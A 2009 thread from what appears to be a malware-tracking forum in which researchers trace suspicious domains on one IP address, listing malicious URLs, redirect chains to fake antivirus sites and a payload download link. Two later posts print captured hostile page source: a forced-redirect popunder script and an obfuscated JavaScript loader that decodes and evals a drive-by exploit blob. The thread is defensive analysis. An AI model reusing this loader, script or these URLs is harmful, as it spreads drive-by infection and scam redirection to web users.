Author Topic: Domains on 78.47.186.165  (Read 6455 times)

0 Members and 1 Guest are viewing this topic.

September 10, 2009, 03:34:01 pm
Read 6455 times

jrmurray

  • Newbie

  • Offline
  • *

  • 6
Seeing DNS queries to these domains (and then some) which all resolve to 78.47.186.165 - Any idea what's on the server?  Looks suspicious to me...

http://www.bfk.de/bfk_dnslogger_en.html?query=78.47.186.165#result


September 16, 2009, 06:49:32 pm
Reply #1

jrmurray

  • Newbie

  • Offline
  • *

  • 6
If anyone can provide the slightest idea here, it would be appreciated.  Thanks.

September 17, 2009, 04:06:36 pm
Reply #2

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Can't find anything on them at present, but there were apparently exploits there upto September 8th.
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

September 17, 2009, 04:10:45 pm
Reply #3

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
The IP also apparently houses;

Code: [Select]
etyjyt.info
kb923561.in
kb929399.in
kb936782.in
kb952004.in
kb959426.in
kb960225.in
kb960715.in
kb960803.in
kb960859.info
kb968389.info
ntwin.in
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

September 18, 2009, 05:06:57 pm
Reply #4

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
An active one from egtrhn.info;

Code: [Select]
http://egtrhn.info//index.php?src=583&surl=www.springerrescue.org&sport=80&suri=%2Findex%2Ehtml
Contains:

Code: [Select]
<HTML><HEAD><TITLE> </TITLE><META HTTP-EQUIV="Content-Type" CONTENT="text/html"><META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE"></HEAD><frameset framespacing="0" border="0" rows="1,*" frameborder="0"><frame src="en_pic.php?grp=13&trk=0918170022175763" scrolling="no" noresize marginwidth="0" marginheight="0"><frame src="content.php" scrolling="auto" marginwidth="0" marginheight="0"></frameset></HTML>
Contains some lovely exploits.

http://wepawet.cs.ucsb.edu/view.php?hash=7fe09d99638a268fd5c5ad8e53404af2&t=1253293660&type=js
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

September 21, 2009, 06:45:32 pm
Reply #5

jrmurray

  • Newbie

  • Offline
  • *

  • 6
Great info - Thanks MysteryFCM - so that domain (and this IP) should be added to the MDL, correct?

Any evidence of malware phone-home?  My guess is no, at least not on port 80.


September 21, 2009, 07:18:19 pm
Reply #6

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Haven't listed it yet, because I'm don't find those exploits.
In the my tests a redirection to a rotator

Code: [Select]
traff2go.com/?accs=812&tid=ffie8
occurred which redirected me to a fake av site.
Code: [Select]
virusprotectiontool.com/adv/2/?a=csphbis&l=394&f=cs_123963263&ex=&ed=&sub=csp&prodabbr=3P_UAVC&al=
But it works only once.
A second attempt redirects to www. springerrescue.org as given in url's parameter.

Ruining the bad guy's day

September 24, 2009, 02:36:41 pm
Reply #7

jrmurray

  • Newbie

  • Offline
  • *

  • 6
Today I picked up this domain for the same IP address (it's live):

csbjndez.info

September 24, 2009, 02:41:47 pm
Reply #8

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

September 24, 2009, 02:55:54 pm
Reply #9

jrmurray

  • Newbie

  • Offline
  • *

  • 6
MysteryFCM - I'm curious.  How were you able to grab the URL (index.php ... ) from the domain name you found?

September 24, 2009, 03:01:27 pm
Reply #10

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
I found it on a compromised site. The same URL also works with the one you posted ;)

Code: [Select]
csbjndez.info/index.php?src=583&surl=www.springerrescue.org&sport=80&suri=%2Findex%2Ehtml
Redirects to;

Code: [Select]
csbjndez.info/index2.php?src=583&trk=0924150025488126
Which contains;

Code: [Select]
<HTML><HEAD><TITLE> </TITLE><META HTTP-EQUIV="Content-Type" CONTENT="text/html"><META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE"></HEAD><frameset framespacing="0" border="0" rows="1,*" frameborder="0"><frame src="en_pic.php?grp=14&trk=0924150025488126" scrolling="no" noresize marginwidth="0" marginheight="0"><frame src="content.php" scrolling="auto" marginwidth="0" marginheight="0"></frameset></HTML>
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

September 24, 2009, 03:03:02 pm
Reply #11

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
content.php;

Code: [Select]
<html><head>
<STYLE type="text/css"> body {font-family: Verdana; font-size: 9pt; color: black; background-color: #ffffff;} td {font-family: Verdana; font-size: 9pt; color: black; background-color: #ffffff;} tr {background-color: #ffffff;} table {color: #ffffff; background-color: #999999;} </STYLE>
<title>Loading...</title></head><body>
<table CELLPADDING=0 CELLSPACING=0 width=100% height=100% align=center valign=center border=0><tr><td align=center>
<table CELLPADDING=0 CELLSPACING=0 align=center valign=center border=0><tr><td align=center>

<span id="load"><b>Loading Page, please wait...</b> <img src="loading.gif" width=16 height=16></span>

<script language="JavaScript">

function BDrag(width_div, height_div){
 var tpos="fixed"; if (navigator.appName=="Microsoft Internet Explorer") { var tpos="absolute"; };
 var dnd = document.getElementById("drag_n"); dnd.style.position = tpos; dnd.style.top = "50%"; dnd.style.left = "50%"; dnd.style.marginTop = "-" + height_div / 2 + "px"; dnd.style.marginLeft = "-" + width_div / 2 + "px"; dnd.style.zIndex = "5";
 var dd = document.getElementById("drag"); dd.style.position = tpos; dd.style.width = width_div + "px"; dd.style.height = height_div + "px"; dd.style.zIndex="5";
}


var cflag = true;
var adurl = "http://alsoft.in/hitin.php?affid=02913";
//var adurl = "http://go-traff.com/?accs=812&tid=clkcns";
var adurl2 = "http://dating-portal.net/aff/312/";


function BClick() {
 cflag = false;
 window.open(adurl,"_blank");
 var container=document.getElementById('drag'); if(container) { container.style.visibility='hidden'; }
 clearTimeout(timer); timer=setTimeout('BTime()',5000);
}

var is_XP_SP2 = (navigator.userAgent.indexOf("SV1") != -1) || (navigator.appMinorVersion && (navigator.appMinorVersion.indexOf('SP2') != -1));
var is_IE=false;
if (navigator.appName.toLowerCase()=='microsoft internet explorer') { if (navigator.userAgent.toLowerCase().indexOf('opera')<=0) { is_IE=true; } }
if (is_XP_SP2) { document.write("<object id=iie width=0 height=0 classid='CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6'></object>"); }
function OnUnloadHandler() { if (cflag) { if (is_XP_SP2) { iie.launchURL(adurl); } else { window.open(adurl,"_blank"); } } }
window.onunload = OnUnloadHandler;

function BTime() {
 if (cflag) { cflag = false; top.location=adurl; } else { top.location=adurl2; };
}
var timer=setTimeout('BTime()',10000);

</script>

<span id="drag_n">
<span id="drag" style="display:none;text-align:left;z-index:1;">
<img src="alert_01.gif" width="456" height="164" border="0" onload="document.getElementById('drag').style.display='block'; BDrag(456,164);" onClick="BClick()" />
</span>
</span>

</td></tr></table>
</td></tr></table>
</body></html>


index2.php;

Code: [Select]
<html><head><title>Microsoft</title></head><body>
<script language=JavaScript>function get_pic(z0){var zr0=0,i,j,zr1="1",ff=0xff,zr2="2",z9=0xc,zr3=3,b=0x400,r,z7=3,s=0,z8="ss",w=0,p=0,t=Array(63,52,39,15,46,45,42,43,44,20,0,0,0,0,0,0,1,33,6,21,14,32,55,56,26,28,27,24,57,35,41,17,36,19,22,60,29,30,54,34,53,9,8,0,0,0,0,7,0,37,3,61,49,48,47,5,11,10,23,12,50,18,38,62,40,13,0,51,4,59,58,16,31,25,2);z2=z0;l=z2.length;for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;l--,i--){z1=t[z2.charCodeAt(p++)-48];z3=z1<<s;w|=z3;if(s){z4=0xc5^w;z5=z4&ff;z6=z5;w=w>>8;s-=2;r=r+String.fromCharCode(z6)}else{z7=8;s=6;z8="7";z9=w}}y1="document";y2="write";eval(y1+"."+y2+"(r)")}}y5="f2";y4="get_pic";y3=y4+'("Z0IoAlv8asHpGxUpEW666Uv72fxo6_i7s43l32f5nUh7XBJLNmv6WzhNWzio20iNsm65nUh7XBuLuMSssmv5aJJ5PHipGxoLoMSsMzu6nBh764HLNHu57VU5dH3c8j4fZ0ILsmv5a2Hp6Uio7zJ6NvxLsmv5a_JpVm3o1hf0a3hNFR45dU3o2x0Lojo8PUJLVBh6VW0LZl6NF6656DH82uxLsmv5aJJ8pH75GxDWRU40a3hNFR45dVh6NW0LTWKW2uxLsmv5aJJ8ABho2foLojo8PUJLVBJ7dW0LqByPCU40a3hNFR45dHu5sW0LRzv5szv52uxLsmv5abu5NW0L5BJ8Xofv6J652ov6Azvf7sv6M66vWDH67jJ7X6xpGQxSM_u54WxcSxxS1bxcXx3SdFx01x0SMJhopR0S2uxLsmv5a_JpVU3o1hf0a3hNFR45diH8Gx4ErBLLojo8PUJLVBJpGxUE2uxLsmv5aJJ82Bio2xp6AluLojo8PUJLVBu5VRho2xhpVR767Hhp2uxLsmv5abv81M0LNB662U4uVBJpdvoL6Rhp7V45diH8Nbu5NnopPn65El402uxLsmv5aJJ8VDho2JYNszvLoMSsa_u5SR4fa2Hp6Uio6Uv7pvipFVU5dH3cNj45dW654JJ8AB7uVBJfpn6uVBJ7dl40abv8PnHuEDhc8uxLGR4NPB7N5VDp8j4fa_u5SR4fa2Hp6Uio6Uv7pvipFVU5dH3cNj45dW65Vv45dVh6Nv45dUfuVBJpdv45dVh6Nv45dVH88uxLEDhNNVDpsm3uojD4aJiNdHH75biuauJLdUhfauJLNB662Wf62oi64zv55jJ8VQxvaJJ8pH754JJ8cWH64JJ8Fu45dBH84JJ8VUu84JJ8cWH64JJ85BhuojDpsmH65bv81s40aMJLnmH8nVHuElULoRU8FlJLoRU6A6vNGfiplRU2ZnKMdBJ5jzi5ez65dVDuojDpsmH65bv81s40aMJLnmH8nVHuEl4faxhpdzu57RUcojD4oM70Gv34oMSsa_u5SR4fa2Hp6UvvVzv6AVo6enH68uxLGR4NPB7N5VDp8j4fa_u5SR4fa2Hp6UvvVzv6AVo6enH68uxLGR4NPB7N5VDp8j4faxhpdzu57RUcojD4oM70Z0ILEDhNNVoLNBvL4JJ82B6u2Mx6A6vN7x4uVBu5VR7uVBuNAl40Z0ILsmv5a7vNf6N5dUh6G7vNfW67EUJuXB7c12UL2QGL4JJ8AvoLiU4uVBJp4xoA7Jy8FziNpUDuoMSsasvpaF462o6nVBu5plULoWSsaj462o6nVBu5p4UPSRhpGQf0a7vNf6N5dUh67Mp6AzioVuxL6Uv7HHJ8FWvviRhp7VDuoj462o6nVBu5p44PFlH8EVU6AUp6AlhuoMSsajo8PUJL5Bv5sW0L2uxLsmv5a_H8EWH5GxoLojo8PUJLAHJ8PUJ8GxoLojo8PUJLAmi8VBhNFBho2x40Z0ILa_u5SR4fsmv5a7vNf6NPRHv58RJ8G7vNfW67EUJuXB7c12UL2hNanUh7XBuvRVipNnvL8u3l3jULa_u5Svu8PUJLlHJ7CU76nzG6sWf62o6nmHNNFlH5d4DE7Dh7F6v6pzv6dVoLCUNWBzpaRUDuojU7AUu8Gh755RL56HiE7DJu2FpWZzKEjlGPrUDuojUpdzi6XWf8VVHaF66Nr4v85xUPrWKa2s40GHiNdHH75biuoW70Z0ILaM7NPB7N5VDp8uh4oMSsajD7MRUu5Bv5sW3o2xDuauJL5Bv5sW0LBo0LojD4oMSsajD7MRUuABhppRhoGxoL8j4fa_u5SR4fa3hNFR462o6nMH76G7vNfW67EUJuXB7c12UL2JNNFlH5dlv6W4oE8nipRl75dzi6iUv7EHH82s40a_H8EWH5G7vNf6LpV6vvzzH8RRhpnliNNDp6NBipFVoc8u34nmH8nVHuEl4fGv34oMSsajo8PUJLM4vcGxoLojo8PUJLM4io2x40Z0ILa3hNFR45dUu6AW3WPBJ77x76e4Hp5MZNdVvvFmv6A6i65sou5QxcXjxcXMDc8uDcXjxcXs40Z0ILa3hNFRDpsU3o27vNf6N5dUh67x4uVB75svoLO6vE8nip53v6Nx4uVBuc4xDuo3v6FM0p7v0LoMSsajD7MVop7U3oGxoL8uJ8Fl7fODhoABhppR70M4ioOD7u22yndWH52u45dUu6AvoL7bHfEU40EDhNNVDpsU3uoM7NPB7N5VDp8uh4oM70Z0ILasvp53v6FM3o2xDuoBu5SvJPsWx7AUu8o3v6G_L84xUnyUYEBlNAYzGaynLL4JJ8F4Hp4xovEVhp2u3psmH65bv8Fs40GHiNdHH75biuoW70Gv3l3jUL8DHuM4vcGM0L2s4fdUhfoBL8GFHpFD70M4ioOD7u22ynVl752u45dUu6AvoL7bHfEU40EDhNNVDpsU3uoM7NPB7N5VDp8uh4oM70Z0ILasvpaFop7U3LGxoL8uhl3jULa3hNFRU8VBucGJJ5PHipoMSsajULsmv5a_762o65dWx8VBucoMSsajULsmv5a3iNNUhpdWxcoMSsajULdUhfoWSsajULa3hNFRofXmicGxo8PUJL6Uv7HHJ7NWf62ovL4_75dUfu2M67EUJuXB7c12Un2Jy72uU8VBuc4xDpNnvv2uU8VBuc4xDAXRJ68HiNdl667nLL8u0LojDpsmH650J5Pm3uoMSsajULa3hNFRofXmvcGx462o6nVVH62uU8VBuc4xovRVvL4_75dUfu2bH6NzKf2uU8VBuc4xDpnzJ8EVop7U3uox40EDhNNVofXmvc8u3l3jULaM7NPB7N5VDp8uhl3jULajU8Fl7fZ0ILajULa0J5PH3o27vNf6NP2uU8VBuc4x4anUh7XBuv2uU8VBuc4xDEcz6N53v6Fs402u3psmH650J5PH3uoMSsajULaM7NPB7N5VDp8uhl3jULajULdUhfoWSsajULajUL0RhNdM0Lsmv5a_ipp6662ovcG_66nzh6E4H87x4udHJ8FuoLWzH8rnippU4udHJ8FuoLE4H82uU8VBuc4xoASlKp52LLAzi666vNfnLL8u0Lobv8PnHu0RhNds40Z0ILajULajo8PUJL0RhNeM0LAzi666vNfU0L4_762o65dvoL7sv67zv52uU8VBuc4xUMOWKW2uU86Uv7VB7u2MxpEW666Uv7Fx4ud6vNfHJ84xov84v6EUuL4_75dUfu2FKPZnGL4_762o65dvoL42LLL7vNfU4udHJ8FuoLEHH82uU86Uv7VB7u2j4NNm652uU8VBuc4x458BvL4_762o65dvoLGh4NNHuL4_75dUfu2sHp0x4ud6vNfHJ84xDSFh3c2uU8VBuc4xD0sQHSpxicPH3vd3xSlMD0VQxppJfS2miS2uU8VBuc4xDNMUfcXJfS2uU86Uv7VB7u2hULn6HpEU4udHJ8FuoL2m65EW0L4_762o65dvoLW2LL43v6FuUn2hooL7oL4_762o65dvoL6Uv7EHH82uU8VBuc4xooyU402u3l3jULajULabv8PnHu0RhNes40Z0ILajULaM7NPB7N5VDp8uhl3jULajULaxhpdzu57RopPnv5EB70Z0ILajULaM70Z0ILajULGv3l3jULaM70Z0ILajo5EBh8F4HL1u3l3jULGzH6Vz6fZ0ILajo5EBh8F4HLXu3l3jULGv3l3jD4En65Evu5EBh8F4HLXu34oMSsGv3l33i87HH886v6a7vNfW67EUJuXBuc12U5dU0c8j4fZ0ILsmv5a_JpVW0cluxLsmv5af662oio7zJ6NvxLsmv5aJJ876io2f662oioXBuc1foLojo8PUJLVBhppW0L2u3l3jU8Fl7fEDhNNV45d4664h4AFziNdz6W2oipnBJuXBucFs4G8u34nmH8nVHuEl4fGWSsasvp5Qo66Uv78uJ8Fl7fEDhNNV45d4664h4AFz6G4JJ8EW6uWQH8E6pG4JJ8EW6uWxv7EHH85jJ8Fxxv2xDuWs40GHiNdHH75biuoWh4Z0IL8DHuPf662oiuoBu5SvhpsmH65JJ8766uWJG5Ei4uVBhppv4GPBhpii4uVBhppv4G2oipnBJuXBucF2oL22oL2s4G8u34nmH8nVHuEl4fGWhl3jD7MVDL76vNfl4fdUhfozv8PnHuVBu66v4GzzH8Wu45dzi64h4W2oipWu45dzi64h4NdVoL22U5dU0c8hDuoM7NPB7N5VDp8uh4GWSsasvp5Qo66Uv78uJ8Fl7fEDhNNV45d4664h4EEB7G4JJ8EW6uW7GNfz6G4JJ8EW6uWJH85jJ8Fxxv2xDuWs40GHiNdHH75biuoWh4Z0IL8DHuPf662oiuoBu5SvhpsmH65JJ8766uWhZpdi4uVBhppv4GiUv7Ei4uVBhppv4GnBJuXBucFs4G8u34nmH8nVHuEl4fGWhl3jo5EBh8F4Hu76vNfl40Z0k4Z0S8PUJLdB65GQfSojo8PUJL8Wxcojo8PUJLVB7N2m3o2MUcXjxcpjxcXj3vBRxcXMUcXjxcXjxcXjxcd30Lojo8PUJLVBhcpW0L1MoLojo8PUJLVBh61M0LpQ0LoMSssmv5aFv6nVho7z68aQG5Fmif5xoA@l0SBz3SsMoSeQpc2u45dWic4xDc@R3vSFfctWUcXJKcd3pAFs3EV30LNxDA_l0ABzKE@WDEBi3Ep_fSrU4uVBhcpvoLSJ0cFMUEdQGc1j0S1h3c130LNxUcXj0SbRfcVx4uVB7N2mxv2jxcX30EXJ3A2u45dHvN12oLsbpcFjfSXQZvl30S@WUSrzGSpFfSSJZv@HZcbmZ01_GcbHpc22oLs_3cdb3cFxZv_lfScMUSeQxEpQKc@V3vbHGE@DpcVbK0VJfA22oLl3ZS_i0EsJ3vbR0SbWUSVJ0L4JJ81M6u2F3AF33vVJ30rRfcBR3ArHxE22oLX3fSFJ3EXs3vbBfAFMUSVJH0pFfceF3vXs0EBBZc@UKcl30S22oLsJ30bi0ce3GL4JJ8pmfu2xGc@WUScJ0L4JJ81M6u2QZ0bBZvchxSc_fSsF0cXQxc22oL_mKc1F3SSs0L4JJ8pmfu2_GAVMUSd3i0pFfc_B3vd33cdbxSBVxS_DK022oL@RfAXhxEe33vlJGSSMUSV3GL4JJ81M6u2xKStR3vFb0EeQZc13ZA_m3022oLrVfABHKE@DZvBmGccMUSS30NpxKcej3vsJKclJZ0sxxSl30A22o6enH68u3l33hNFR45d6vNGx462oipnBuLojo8PUJLVBh7AW0L8BvLojo8PUJLVBu5AW0L6Uv7HUyERU40a3hNFRD7ezh6XW06enH6oMSslVi7NzHL5Fv6nV728WYuauhl3jU8Fl7fZ0ILasi8eWH5Gfi8Nn608zh8pRhoA66NeWip7BuvnUhpPBhprnippzv6dV45d6vN8u37ezh6X445EBhAdBu58Ui8dzHuVBh7An45dUJp4siuosi8eWH57JhpdmK8dUh72zJ8EVoLnniNVHuL4JJ88BHv2JH6VU4uVBh7AvoL0x4u546NcvY7Kl40Z0ILGHiNdHH75biuoW70Z0IL8DHu8zh8pRhuoBu5Svh7MVU6VUu65si8eWH58s4f2UhpPv60Gv34nmH8nVHuEl4fGv34oMSsas6u4u3l3Mhl32fvVHv58RJ8uMSsZ0kl32fv26HpS43l32fv5Bh6N43l3b")';y6="()";eval(y3);</script>
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

September 24, 2009, 03:13:36 pm
Reply #12

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Forgot to mention, the payload is here btw;

Code: [Select]
csbjndez.info/gfl.php?d=11&trk=09241506645213975&s=002
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net